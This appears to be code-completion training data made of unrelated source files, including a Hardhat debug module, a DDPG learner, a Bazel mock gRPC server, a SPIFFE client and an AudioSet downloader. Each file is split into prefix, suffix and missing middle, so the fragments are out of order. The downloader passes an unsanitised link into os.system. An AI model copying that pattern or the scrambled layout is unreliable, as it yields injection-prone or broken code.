import { validateParams } from "../../../core/jsonrpc/types/input/validation";
import { MethodNotFoundError } from "../../../core/providers/errors";
import { HardhatNode } from "../node";
import { RpcDebugTraceOutput } from "../output";
/* eslint-disable @nomiclabs/only-hardhat-error */
export class | {
constructor(private readonly _node: HardhatNode) {}
public async processRequest(
method: string,
params: any[] = []
): Promise<any> {
switch (method) {
case "debug_traceTransaction":
return this._traceTransactionAction(
...this._traceTransactionParams(params)
);
}
throw new MethodNotFoundError(`Method ${method} not found`);
}
// debug_traceTransaction
private _traceTransactionParams(
params: any[]
): [Buffer, RpcDebugTracingConfig] {
return validateParams(params, rpcHash, rpcDebugTracingConfig);
}
private async _traceTransactionAction(
hash: Buffer,
config: RpcDebugTracingConfig
): Promise<RpcDebugTraceOutput> {
return this._node.traceTransaction(hash, config);
}
}
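// Usage sketch (assumes an initialized HardhatNode `node` and a hex-encoded
// transaction hash; validateParams decodes it into a Buffer via rpcHash):
//   const debug = new DebugModule(node);
//   const trace = await debug.processRequest("debug_traceTransaction", [txHash]);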
| DebugModule |
fast-forward-outline.tsx | import React from 'react'
export const FastForwardOutline = React.memo<React.SVGProps<SVGSVGElement>>(props => (
<svg {...props} xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke="currentColor"> | <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M11.933 12.8a1 1 0 000-1.6L6.6 7.2A1 1 0 005 8v8a1 1 0 001.6.8l5.333-4zM19.933 12.8a1 1 0 000-1.6l-5.333-4A1 1 0 0013 8v8a1 1 0 001.6.8l5.333-4z"/>
</svg>
)) |
|
action_tls_ca_append.go | //
// DISCLAIMER
//
// Copyright 2020-2021 ArangoDB GmbH, Cologne, Germany
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Copyright holder is ArangoDB GmbH, Cologne, Germany
//
// Author Adam Janikowski
// Author Tomasz Mielech
//
package reconcile
import (
"context"
"encoding/base64"
meta "k8s.io/apimachinery/pkg/apis/meta/v1"
"github.com/arangodb/kube-arangodb/pkg/util/errors"
"github.com/arangodb/kube-arangodb/pkg/deployment/patch"
"github.com/arangodb/kube-arangodb/pkg/util"
"github.com/arangodb/kube-arangodb/pkg/util/k8sutil"
"k8s.io/apimachinery/pkg/types"
api "github.com/arangodb/kube-arangodb/pkg/apis/deployment/v1"
"github.com/arangodb/kube-arangodb/pkg/deployment/resources"
"github.com/rs/zerolog"
)
func init() {
registerAction(api.ActionTypeAppendTLSCACertificate, newAppendTLSCACertificateAction)
}
func newAppendTLSCACertificateAction(log zerolog.Logger, action api.Action, actionCtx ActionContext) Action {
a := &appendTLSCACertificateAction{}
a.actionImpl = newActionImplDefRef(log, action, actionCtx, operationTLSCACertificateTimeout)
return a
}
type appendTLSCACertificateAction struct {
actionImpl
actionEmptyCheckProgress
}
func (a *appendTLSCACertificateAction) Start(ctx context.Context) (bool, error) {
if !a.actionCtx.GetSpec().TLS.IsSecure() {
return true, nil
}
certChecksum, exists := a.action.Params[checksum]
if !exists {
a.log.Warn().Msgf("Key %s is missing in action", checksum)
return true, nil
}
caSecret, exists := a.actionCtx.GetCachedStatus().Secret(a.actionCtx.GetSpec().TLS.GetCASecretName())
if !exists {
a.log.Warn().Msgf("Secret %s is missing", a.actionCtx.GetSpec().TLS.GetCASecretName())
return true, nil
}
caFolder, exists := a.actionCtx.GetCachedStatus().Secret(resources.GetCASecretName(a.actionCtx.GetAPIObject()))
if !exists |
ca, _, err := resources.GetKeyCertFromSecret(a.log, caSecret, resources.CACertName, resources.CAKeyName)
if err != nil {
a.log.Warn().Err(err).Msgf("Cert %s is invalid", resources.GetCASecretName(a.actionCtx.GetAPIObject()))
return true, nil
}
caData, err := ca.ToPem()
if err != nil {
a.log.Warn().Err(err).Str("secret", resources.GetCASecretName(a.actionCtx.GetAPIObject())).Msgf("Unable to encode CA into PEM")
return true, nil
}
caSha := util.SHA256(caData)
if caSha != certChecksum {
a.log.Warn().Msgf("Cert changed")
return true, nil
}
if _, exists := caFolder.Data[caSha]; exists {
a.log.Warn().Msgf("Cert already exists")
return true, nil
}
p := patch.NewPatch()
p.ItemAdd(patch.NewPath("data", caSha), base64.StdEncoding.EncodeToString(caData))
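// The marshaled patch is, schematically (values illustrative):
//   [{"op":"add","path":"/data/<caSha>","value":"<base64 PEM>"}]
// i.e. the CA certificate is appended to the truststore secret under its checksum.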
patch, err := p.Marshal()
if err != nil {
a.log.Error().Err(err).Msgf("Unable to marshal patch")
return true, nil
}
err = k8sutil.RunWithTimeout(ctx, func(ctxChild context.Context) error {
_, err := a.actionCtx.SecretsModInterface().Patch(ctxChild, resources.GetCASecretName(a.actionCtx.GetAPIObject()), types.JSONPatchType, patch, meta.PatchOptions{})
return err
})
if err != nil {
if !k8sutil.IsInvalid(err) {
return false, errors.Wrapf(err, "Unable to update secret: %s", string(patch))
}
}
return true, nil
}
| {
a.log.Warn().Msgf("Secret %s is missing", resources.GetCASecretName(a.actionCtx.GetAPIObject()))
return true, nil
} |
ddpg.py | """Author: Brandon Trabucco, Copyright 2019, MIT License"""
from playground.algorithms.algorithm import Algorithm
import tensorflow as tf
class DDPG(Algorithm):
def __init__(
self,
policy,
target_policy,
qf,
target_qf,
replay_buffer,
reward_scale=1.0,
discount=0.99,
observation_key="observation",
batch_size=32,
update_every=1,
update_after=0,
logger=None,
logging_prefix="ddpg/"
):
# train a policy using the deep deterministic policy gradient
Algorithm.__init__(
self,
replay_buffer,
batch_size=batch_size,
update_every=update_every,
update_after=update_after,
logger=logger,
logging_prefix=logging_prefix)
# each neural network is probabilistic
self.policy = policy
self.target_policy = target_policy
self.qf = qf
self.target_qf = target_qf
# select into the observation dictionary
self.observation_key = observation_key
# control some parameters that are important for ddpg
self.reward_scale = reward_scale
self.discount = discount
def | (
self,
observations,
actions,
rewards,
next_observations,
terminals
):
# select from the observation dictionary
observations = observations[self.observation_key]
next_observations = next_observations[self.observation_key]
# build a tape to collect gradients from the policy and critics
with tf.GradientTape(persistent=True) as tape:
mean_actions, log_pi = self.policy.expected_value(observations)
next_mean_actions, next_log_pi = self.target_policy.expected_value(
next_observations)
# build the q function target value
inputs = tf.concat([next_observations, next_mean_actions], -1)
target_qf_value = self.target_qf(inputs)[..., 0]
self.record("target_qf_value", tf.reduce_mean(target_qf_value).numpy())
qf_targets = tf.stop_gradient(
self.reward_scale * rewards + terminals * self.discount * (
target_qf_value))
self.record("qf_targets", tf.reduce_mean(qf_targets).numpy())
# build the q function loss
inputs = tf.concat([observations, actions], -1)
qf_value = self.qf(inputs)[..., 0]
self.record("qf_value", tf.reduce_mean(qf_value).numpy())
qf_loss = tf.reduce_mean(tf.keras.losses.logcosh(qf_targets, qf_value))
self.record("qf_loss", qf_loss.numpy())
# build the policy loss
inputs = tf.concat([observations, mean_actions], -1)
policy_qf_value = self.qf(inputs)[..., 0]
self.record("policy_qf_value", tf.reduce_mean(policy_qf_value).numpy())
policy_loss = -tf.reduce_mean(policy_qf_value)
self.record("policy_loss", policy_loss.numpy())
# back prop gradients
self.policy.apply_gradients(
self.policy.compute_gradients(policy_loss, tape))
self.qf.apply_gradients(
self.qf.compute_gradients(qf_loss, tape))
# soft update target parameters
self.target_policy.soft_update(self.policy.get_weights())
self.target_qf.soft_update(self.qf.get_weights())
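# sketch of what soft_update is assumed to do (Polyak averaging with some
# rate tau): theta_target <- tau * theta + (1 - tau) * theta_target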
| update_algorithm |
execution_server.rs | use std::collections::VecDeque;
use std::fmt::Debug;
use std::iter::FromIterator;
use std::ops::Deref;
use std::sync::{Arc, Mutex};
use std::thread::sleep;
use std::time::Duration;
use std::time::Instant;
use bazel_protos;
use futures::{Future, Sink};
use grpcio;
use protobuf;
#[derive(Clone, Debug)]
pub struct MockExecution {
name: String,
execute_request: bazel_protos::remote_execution::ExecuteRequest,
operation_responses:
Arc<Mutex<VecDeque<(bazel_protos::operations::Operation, Option<Duration>)>>>,
}
impl MockExecution {
///
/// # Arguments:
/// * `name` - The name of the operation. It is assumed that all operation_responses use this
/// name.
/// * `execute_request` - The expected ExecuteRequest.
/// * `operation_responses` - Vec of Operation responses for Execution or GetOperation requests.
/// Will be returned in order.
///
pub fn new(
name: String,
execute_request: bazel_protos::remote_execution::ExecuteRequest,
operation_responses: Vec<(bazel_protos::operations::Operation, Option<Duration>)>,
) -> MockExecution {
MockExecution {
name: name,
execute_request: execute_request,
operation_responses: Arc::new(Mutex::new(VecDeque::from(operation_responses))),
}
}
}
///
/// A server which will answer ExecuteRequest and GetOperation gRPC requests with pre-canned
/// responses.
///
pub struct TestServer {
pub mock_responder: MockResponder,
server_transport: grpcio::Server,
}
impl TestServer {
///
/// # Arguments
/// * `mock_execution` - The canned responses to issue. Returns the MockExecution's
/// operation_responses in order to any ExecuteRequest or GetOperation
/// requests.
/// If an ExecuteRequest request is received which is not equal to this
/// MockExecution's execute_request, an error will be returned.
/// If a GetOperation request is received whose name is not equal to this
/// MockExecution's name, or more requests are received than stub responses
/// are available for, an error will be returned.
pub fn new(mock_execution: MockExecution) -> TestServer {
let mock_responder = MockResponder::new(mock_execution);
let env = Arc::new(grpcio::Environment::new(1));
let mut server_transport = grpcio::ServerBuilder::new(env)
.register_service(bazel_protos::remote_execution_grpc::create_execution(
mock_responder.clone(),
))
.register_service(bazel_protos::operations_grpc::create_operations(
mock_responder.clone(),
))
.bind("localhost", 0)
.build()
.unwrap();
server_transport.start();
TestServer {
mock_responder: mock_responder,
server_transport,
}
}
///
/// The address on which this server is listening over insecure HTTP transport.
///
pub fn address(&self) -> String {
let bind_addr = self.server_transport.bind_addrs().first().unwrap();
format!("{}:{}", bind_addr.0, bind_addr.1)
}
}
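// Usage sketch (assumes a prepared ExecuteRequest `req` and canned operation
// responses `ops`; names are illustrative):
//   let server = TestServer::new(MockExecution::new("op".to_owned(), req, ops));
//   let address = server.address(); // point the client under test here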
impl Drop for TestServer {
fn drop(&mut self) {
let remaining_expected_responses = self
.mock_responder
.mock_execution
.operation_responses
.lock()
.unwrap()
.len();
assert_eq!(
remaining_expected_responses,
0,
"Expected {} more requests. Remaining expected responses:\n{}\nReceived requests:\n{}",
remaining_expected_responses,
MockResponder::display_all(&Vec::from_iter(
self
.mock_responder
.mock_execution
.operation_responses
.lock()
.unwrap()
.clone(),
)),
MockResponder::display_all(
&self
.mock_responder
.received_messages
.deref()
.lock()
.unwrap()
)
)
}
}
#[derive(Clone, Debug)]
pub struct MockResponder {
mock_execution: MockExecution,
pub received_messages: Arc<Mutex<Vec<(String, Box<protobuf::Message>, Instant)>>>,
}
impl MockResponder {
fn new(mock_execution: MockExecution) -> MockResponder {
MockResponder {
mock_execution: mock_execution,
received_messages: Arc::new(Mutex::new(vec![])),
}
}
fn log<T: protobuf::Message + Sized>(&self, message: T) {
self.received_messages.lock().unwrap().push((
message.descriptor().name().to_string(),
Box::new(message),
Instant::now(),
));
}
fn display_all<D: Debug>(items: &[D]) -> String {
items
.iter()
.map(|i| format!("{:?}\n", i))
.collect::<Vec<_>>()
.concat()
}
fn send_next_operation_unary(
&self,
sink: grpcio::UnarySink<super::bazel_protos::operations::Operation>,
) {
match self
.mock_execution
.operation_responses
.lock()
.unwrap()
.pop_front()
{
Some((op, duration)) => {
if let Some(d) = duration {
sleep(d);
}
sink.success(op.clone());
}
None => {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect further requests from client.".to_string()),
));
}
}
}
fn send_next_operation_stream(
&self,
ctx: grpcio::RpcContext,
sink: grpcio::ServerStreamingSink<super::bazel_protos::operations::Operation>,
) {
match self
.mock_execution
.operation_responses
.lock()
.unwrap()
.pop_front()
{
Some((op, duration)) => {
if let Some(d) = duration {
sleep(d);
}
ctx.spawn(
sink
.send((op.clone(), grpcio::WriteFlags::default()))
.map(|mut stream| stream.close())
.map(|_| ())
.map_err(|_| ()),
)
}
None => ctx.spawn(
sink
.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect further requests from client.".to_string()),
))
.map(|_| ())
.map_err(|_| ()),
),
}
}
}
impl bazel_protos::remote_execution_grpc::Execution for MockResponder {
// We currently only support the one-shot "stream and disconnect" client behavior.
// If we start supporting the "stream updates" variant, we will need to do so here.
fn execute(
&self,
ctx: grpcio::RpcContext,
req: bazel_protos::remote_execution::ExecuteRequest,
sink: grpcio::ServerStreamingSink<bazel_protos::operations::Operation>,
) {
self.log(req.clone());
if self.mock_execution.execute_request != req |
self.send_next_operation_stream(ctx, sink);
}
fn wait_execution(
&self,
_ctx: grpcio::RpcContext,
_req: bazel_protos::remote_execution::WaitExecutionRequest,
_sink: grpcio::ServerStreamingSink<bazel_protos::operations::Operation>,
) {
unimplemented!()
}
}
impl bazel_protos::operations_grpc::Operations for MockResponder {
fn get_operation(
&self,
_: grpcio::RpcContext,
req: bazel_protos::operations::GetOperationRequest,
sink: grpcio::UnarySink<bazel_protos::operations::Operation>,
) {
self.log(req.clone());
self.send_next_operation_unary(sink)
}
fn list_operations(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::ListOperationsRequest,
sink: grpcio::UnarySink<bazel_protos::operations::ListOperationsResponse>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
fn delete_operation(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::DeleteOperationRequest,
sink: grpcio::UnarySink<bazel_protos::empty::Empty>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
fn cancel_operation(
&self,
_: grpcio::RpcContext,
_: bazel_protos::operations::CancelOperationRequest,
sink: grpcio::UnarySink<bazel_protos::empty::Empty>,
) {
sink.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::Unimplemented,
None,
));
}
}
| {
ctx.spawn(
sink
.fail(grpcio::RpcStatus::new(
grpcio::RpcStatusCode::InvalidArgument,
Some("Did not expect this request".to_string()),
))
.map_err(|_| ()),
);
return;
} |
client.go | package main
import (
"bufio"
"context"
"fmt"
"io"
"log"
"os"
"time"
"github.com/spiffe/go-spiffe/v2/spiffeid"
"github.com/spiffe/go-spiffe/v2/spiffetls"
"github.com/spiffe/go-spiffe/v2/spiffetls/tlsconfig"
"github.com/spiffe/go-spiffe/v2/workloadapi"
)
const (
socketPath = "unix:///tmp/agent.sock"
)
func | () {
// Setup context
ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
defer cancel()
// Allowed SPIFFE ID
// trust domain and workload ID are passed as arguments
spiffeID := spiffeid.Must(os.Args[4], os.Args[5])
// server hostname and port are passed as arguments
serverAddress := os.Args[2] + ":" + os.Args[3]
conn, err := spiffetls.DialWithMode(ctx, "tcp", serverAddress,
spiffetls.MTLSClientWithSourceOptions(
tlsconfig.AuthorizeID(spiffeID),
workloadapi.WithClientOptions(workloadapi.WithAddr(socketPath)),
))
if err != nil {
log.Fatalf("could not create TLS connection: %v", err)
}
defer conn.Close()
// the first CLI argument is sent as the message
message := os.Args[1] + "\n"
log.Printf("Client sent: %q", message)
// Send a message to the server using the TLS connection
fmt.Fprint(conn, message)
// Read server response
status, err := bufio.NewReader(conn).ReadString('\n')
if err != nil && err != io.EOF {
log.Fatalf("Unable to read server response: %v", err)
}
log.Printf("Server replied: %q", status)
}
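// Invocation sketch (argument order per the os.Args indices above; values are
// illustrative):
//   ./client "hello" localhost 55555 example.org server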
| main |
1239. Maximum Length of a Concatenated String with Unique Characters.go | package leetcode
import (
"math/bits"
)
func maxLength(arr []string) int {
c, res := []uint32{}, 0 | mask = mask | 1<<(c-'a')
}
if len(s) != bits.OnesCount32(mask) { // skip strings that themselves contain duplicate characters
continue
}
c = append(c, mask)
}
dfs(c, 0, 0, &res)
return res
}
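// Bitmask sketch (assumes lowercase a-z input): "abc" -> 0b111 and "de" -> 0b11000;
// two strings can be concatenated without duplicate characters iff mask1&mask2 == 0.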
func dfs(c []uint32, index int, mask uint32, res *int) {
*res = max(*res, bits.OnesCount32(mask))
for i := index; i < len(c); i++ {
if mask&c[i] == 0 {
dfs(c, i+1, mask|c[i], res)
}
}
return
}
func max(a, b int) int {
if a > b {
return a
}
return b
} | for _, s := range arr {
var mask uint32
for _, c := range s { |
as_download.py | '''
================================================
DOWNLOAD_AUDIOSET REPOSITORY
================================================
Original:
repository name: download_audioset
repository version: 1.0
repository link: https://github.com/jim-schwoebel/download_audioset
author: Jim Schwoebel
author contact: [email protected]
description: downloads the raw audio files from AudioSet (released by Google).
license category: opensource
license: Apache 2.0 license
organization name: NeuroLex Laboratories, Inc.
location: Seattle, WA
website: https://neurolex.ai
release date: 2018-11-08
Edit:
repository name: download_audioset
repository version: 1.1
repository link: https://github.com/frozenburst/download_audioset
author: POYU WU
release date: 2020-11-10
This code (download_audioset) is hereby released under a Apache 2.0 license license.
For more information, check out the license terms below.
================================================
SPECIAL NOTES
================================================
This script parses through the entire balanced audioset dataset and downloads
all the raw audio files. The files are arranged in folders according to their
representative classes.
Please ensure that you have roughly 35GB of free space on your computer before
downloading the files. Note that it may take up to 2 days to fully download
all the files.
Enjoy! - :)
#-Jim
================================================
LICENSE TERMS
================================================
Copyright 2018 NeuroLex Laboratories, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================================================
SERVICE STATEMENT
================================================
If you are using the code written for a larger project, we are
happy to consult with you and help you with deployment. Our team
has >10 world experts in Kafka distributed architectures, microservices
built on top of Node.js / Python / Docker, and applying machine learning to
model speech and text data.
We have helped a wide variety of enterprises - small businesses,
researchers, enterprises, and/or independent developers.
If you would like to work with us let us know @ [email protected].
usage: as_download.py [options]
options:
--data_pth=<data path>
--label_pth=<labels.xlsx>
--segment_file=<xlsx file>
--partial=<0, 1, 2, ...> # The unbalanced csv can be split into parts for parallel downloads.
'''
################################################################################
## IMPORT STATEMENTS ##
################################################################################
import pafy, os, shutil, time, ffmpy
import os.path as op
import pandas as pd
import soundfile as sf
from natsort import natsorted
from tqdm import tqdm
from pathlib import Path
from docopt import docopt
################################################################################
## HELPER FUNCTIONS ##
################################################################################
#function to clean labels
def convertlabels(sortlist,labels,textlabels):
clabels=list()
# sortlist arrives as a comma-separated string of label ids; split it into a list.
sortlist = sortlist.split(',')
for i in range(len(sortlist)):
#find index in list corresponding
index=labels.index(sortlist[i])
clabel=textlabels[index]
#pull out converted label
clabels.append(clabel)
return clabels
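# Worked example (hypothetical label table): with labels=['/m/09x0r'] and
# textlabels=['Speech'], convertlabels('/m/09x0r', labels, textlabels) returns ['Speech'].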
def download_audio(link):
listdir=os.listdir()
cmd = f"youtube-dl --quiet -f 'bestaudio[ext=m4a]' '{link}'"
print(cmd)
os.system(cmd)
listdir2=os.listdir()
filename=''
for i in range(len(listdir2)):
if listdir2[i] not in listdir and listdir2[i].endswith('.m4a'):
filename=listdir2[i]
break
return filename
################################################################################
## MAIN SCRIPT ##
################################################################################
if __name__ == '__main__':
args = docopt(__doc__)
print(args)
data_pth = args['--data_pth']
label_pth = args['--label_pth']
segment_file = args['--segment_file']
partial = args['--partial']
if data_pth is None:
raise ValueError("Please set the path for model's output.")
if label_pth is None:
raise ValueError("Please set the path for model's output.")
if segment_file is None:
raise ValueError("Please set the path for model's output.")
if partial is not None:
print("Partial detected. The naming of wav would follow the partial name.")
defaultdir=os.getcwd() | #load labels of the videos
#number, label, words
loadfile=pd.read_excel(label_pth)
number=loadfile.iloc[:,0].tolist()
labels=loadfile.iloc[:,1].tolist()
textlabels=loadfile.iloc[:,2].tolist()
#remove spaces for folders
for i in range(len(textlabels)):
textlabels[i]=textlabels[i].replace(' ','')
#now load data for download
xlsx_filename = segment_file
if op.isfile(xlsx_filename) is False:
raise ValueError("Xlsx file of segment is not exits with value:", xlsx_filename)
loadfile2=pd.read_excel(xlsx_filename)
# ylabels have to be cleaned to make a good list (CSV --> LIST)
yid=loadfile2.iloc[:,0].tolist()[2:]
ystart=loadfile2.iloc[:,1].tolist()[2:]
yend=loadfile2.iloc[:,2].tolist()[2:]
ylabels=loadfile2.iloc[:,3].tolist()[2:]
dataset_dir = data_pth
if op.isdir(dataset_dir) is False:
raise ValueError("Dataset directory is not exits with path:", dataset_dir)
#make folders
if partial is not None:
# segment_folder_name = op.basename(xlsx_filename).split('.')[0]
# Keep it simple: every partial shares the same folder name.
segment_folder_name = 'unbalanced_train_segments'
else:
segment_folder_name = op.basename(xlsx_filename).split('.')[0]
try:
defaultdir2=op.join(dataset_dir, segment_folder_name)
os.chdir(defaultdir2)
except:
defaultdir2=op.join(dataset_dir, segment_folder_name)
os.mkdir(defaultdir2)
os.chdir(defaultdir2)
# Also check for files that already exist so downloads can resume.
# Implemented by frozenburst
existing_wavfiles=list()
for dirname in tqdm(sorted(Path(defaultdir2).glob('*'))):
if partial is not None:
for filename in sorted(Path(dirname).glob(f'{partial}_*')):
existing_wavfiles.append(op.basename(filename))
else:
for filename in sorted(Path(dirname).glob(f'*')):
existing_wavfiles.append(op.basename(filename))
# find the last downloaded file so we can resume where we left off
existing_wavfiles=natsorted(existing_wavfiles)
print(existing_wavfiles)
try:
lastfile=int(existing_wavfiles[-1].split('.')[0][7:])
except:
lastfile=0
# iterate through the entire segment list; download, convert, and snip each clip
slink='https://www.youtube.com/watch?v='
for i in tqdm(range(len(yid))):
if i < lastfile:
# print('Skipping, already downloaded file...')
continue
else:
link=slink+yid[i]
start=float(ystart[i])
end=float(yend[i])
# print(ylabels[i])
clabels=convertlabels(ylabels[i],labels,textlabels)
# print(clabels)
if clabels != []:
#change to the right directory
for j in range(len(clabels)):
newdir = op.join(defaultdir2, clabels[j])
if op.isdir(newdir) is False:
os.mkdir(newdir)
os.chdir(newdir)
# if this clip has not been downloaded yet, download and snip it
lastdir=os.getcwd()
if partial is not None:
filename_check = f'{partial}_snipped'+str(i)+'.wav'
else:
filename_check = 'snipped'+str(i)+'.wav'
if filename_check not in os.listdir():
try:
# use YouTube DL to download audio
filename=download_audio(link)
extension='.m4a'
#get file extension and convert to .wav for processing later
os.rename(filename,'%s%s'%(str(i),extension))
filename='%s%s'%(str(i),extension)
if extension not in ['.wav']:
xindex=filename.find(extension)
filename=filename[0:xindex]
ff=ffmpy.FFmpeg(
inputs={filename+extension:None},
outputs={filename+'.wav':None}
)
ff.run()
os.remove(filename+extension)
file=filename+'.wav'
data,samplerate=sf.read(file)
totalframes=len(data)
totalseconds=totalframes/samplerate
startsec=start
startframe=samplerate*startsec
endsec=end
endframe=samplerate*endsec
# print(startframe)
# print(endframe)
if partial is not None:
newname = f'{partial}_snipped'+file
else:
newname = 'snipped'+file
sf.write(newname, data[int(startframe):int(endframe)], samplerate)
snippedfile=newname
os.remove(file)
except:
print('download failed; skipping')
# sleep 2 seconds to prevent the IP from getting banned
time.sleep(2)
else:
print('skipping, already downloaded file...') | os.chdir(defaultdir)
|
main.rs | extern crate gl_generator;
use gl_generator::{Registry, Api, Profile, Fallbacks};
use std::env;
use std::fs::File;
use std::io::Write;
use std::path::Path;
mod textures;
fn main() {
let dest = env::var("OUT_DIR").unwrap();
let dest = Path::new(&dest);
textures::build_texture_file(&mut File::create(&dest.join("textures.rs")).unwrap());
println!("cargo:rerun-if-changed=build/main.rs");
let mut file_output = File::create(&dest.join("gl_bindings.rs")).unwrap();
generate_gl_bindings(&mut file_output);
}
fn | <W>(dest: &mut W) where W: Write {
let gl_registry = Registry::new(
Api::Gl,
(4, 5),
Profile::Compatibility,
Fallbacks::None,
vec![
"GL_AMD_depth_clamp_separate",
"GL_APPLE_vertex_array_object",
"GL_ARB_bindless_texture",
"GL_ARB_buffer_storage",
"GL_ARB_compute_shader",
"GL_ARB_copy_buffer",
"GL_ARB_debug_output",
"GL_ARB_depth_texture",
"GL_ARB_direct_state_access",
"GL_ARB_draw_buffers",
"GL_ARB_ES2_compatibility",
"GL_ARB_ES3_compatibility",
"GL_ARB_ES3_1_compatibility",
"GL_ARB_ES3_2_compatibility",
"GL_ARB_framebuffer_sRGB",
"GL_ARB_geometry_shader4",
"GL_ARB_gpu_shader_fp64",
"GL_ARB_gpu_shader_int64",
"GL_ARB_invalidate_subdata",
"GL_ARB_multi_draw_indirect",
"GL_ARB_occlusion_query",
"GL_ARB_pixel_buffer_object",
"GL_ARB_robustness",
"GL_ARB_shader_image_load_store",
"GL_ARB_shader_objects",
"GL_ARB_texture_buffer_object",
"GL_ARB_texture_float",
"GL_ARB_texture_multisample",
"GL_ARB_texture_rg",
"GL_ARB_texture_rgb10_a2ui",
"GL_ARB_transform_feedback3",
"GL_ARB_vertex_buffer_object",
"GL_ARB_vertex_shader",
"GL_ATI_draw_buffers",
"GL_ATI_meminfo",
"GL_EXT_debug_marker",
"GL_EXT_direct_state_access",
"GL_EXT_framebuffer_blit",
"GL_EXT_framebuffer_multisample",
"GL_EXT_framebuffer_object",
"GL_EXT_framebuffer_sRGB",
"GL_EXT_gpu_shader4",
"GL_EXT_packed_depth_stencil",
"GL_EXT_provoking_vertex",
"GL_EXT_texture_array",
"GL_EXT_texture_buffer_object",
"GL_EXT_texture_compression_s3tc",
"GL_EXT_texture_filter_anisotropic",
"GL_EXT_texture_integer",
"GL_EXT_texture_sRGB",
"GL_EXT_transform_feedback",
"GL_GREMEDY_string_marker",
"GL_KHR_robustness",
"GL_NVX_gpu_memory_info",
"GL_NV_conditional_render",
"GL_NV_vertex_attrib_integer_64bit",
],
);
let gles_registry = Registry::new(
Api::Gles2,
(3, 1),
Profile::Compatibility,
Fallbacks::None,
vec![
"GL_ANGLE_framebuffer_multisample",
"GL_APPLE_framebuffer_multisample",
"GL_APPLE_sync",
"GL_ARM_rgba8",
"GL_EXT_buffer_storage",
"GL_EXT_disjoint_timer_query",
"GL_EXT_multi_draw_indirect",
"GL_EXT_multisampled_render_to_texture",
"GL_EXT_occlusion_query_boolean",
"GL_EXT_primitive_bounding_box",
"GL_EXT_robustness",
"GL_KHR_debug",
"GL_NV_copy_buffer",
"GL_NV_framebuffer_multisample",
"GL_NV_internalformat_sample_query",
"GL_NV_pixel_buffer_object",
"GL_OES_depth_texture",
"GL_OES_draw_elements_base_vertex",
"GL_OES_packed_depth_stencil",
"GL_OES_primitive_bounding_box",
"GL_OES_rgb8_rgba8",
"GL_OES_texture_buffer",
"GL_OES_texture_npot",
"GL_OES_vertex_array_object",
"GL_OES_vertex_type_10_10_10_2",
],
);
(gl_registry + gles_registry)
.write_bindings(gl_generator::StructGenerator, dest)
.unwrap();
}
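// Usage sketch (assumption: the crate includes the generated file and loads the
// function pointers at runtime):
//   include!(concat!(env!("OUT_DIR"), "/gl_bindings.rs"));
//   // then, with some loader closure: let gl = Gl::load_with(|s| lookup(s));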
| generate_gl_bindings |
SignInPhones.tsx | import React from 'react'
const SignInPhones: React.FC = () => {
return ( | alt="Phones"
draggable="false"
/>
<img
className="h-[69%] absolute top-24 right-[3.75rem]"
src="/phone-content.jpeg"
alt="Phone Content"
draggable="false"
/>
</div>
)
}
export default SignInPhones | <div className="relative hidden md:inline-block">
<img
className="h-[37rem] relative"
src="/phones.png" |
linspace.rs |
use std::iter;
use std::num::{Float, NumCast};
/// An iterator of `n` evenly spaced floats.
///
/// Iterator element type is `F`.
pub type Linspace<F> = iter::Take<iter::Counter<F>>;
/// Return an iterator with `n` elements, where the first
/// element is `a` and the last element is `b`.
///
/// Iterator element type is `F`.
///
/// ```
/// use itertools as it;
/// let mut xs = it::linspace::<f32>(0., 1., 5);
/// assert_eq!(xs.collect::<Vec<_>>(),
/// vec![0., 0.25, 0.5, 0.75, 1.0]);
/// ```
#[inline]
pub fn | <F: Float>(a: F, b: F, n: usize) -> Linspace<F>
{
if n != 0 {
let nf: F = NumCast::from(n).unwrap();
let step = (b - a)/(nf - Float::one());
iter::count(a, step).take(n)
} else {
iter::count(a, Float::one()).take(n)
}
}
| linspace |
gitlab.go | package client
import (
"crypto/tls"
"errors"
"net/http"
"os"
"strings"
"github.com/apex/log"
"github.com/goreleaser/goreleaser/internal/artifact"
"github.com/goreleaser/goreleaser/internal/tmpl"
"github.com/goreleaser/goreleaser/pkg/config"
"github.com/goreleaser/goreleaser/pkg/context"
"github.com/xanzy/go-gitlab"
)
// ErrExtractHashFromFileUploadURL indicates the file upload hash could not be extracted from the url
var ErrExtractHashFromFileUploadURL = errors.New("could not extract hash from gitlab file upload url")
type gitlabClient struct {
client *gitlab.Client
}
// NewGitLab returns a gitlab client implementation
func NewGitLab(ctx *context.Context) (Client, error) {
token := ctx.Token
transport := &http.Transport{
TLSClientConfig: &tls.Config{
// nolint: gosec
InsecureSkipVerify: ctx.Config.GitLabURLs.SkipTLSVerify,
},
}
var options = []gitlab.ClientOptionFunc{
gitlab.WithHTTPClient(&http.Client{
Transport: transport,
}),
}
if ctx.Config.GitLabURLs.API != "" {
options = append(options, gitlab.WithBaseURL(ctx.Config.GitLabURLs.API))
}
client, err := gitlab.NewClient(token, options...)
if err != nil {
return &gitlabClient{}, err
}
return &gitlabClient{client: client}, nil
}
// CreateFile gets a file in the repository at a given path
// and updates if it exists or creates it for later pipes in the pipeline
func (c *gitlabClient) CreateFile(
ctx *context.Context,
commitAuthor config.CommitAuthor,
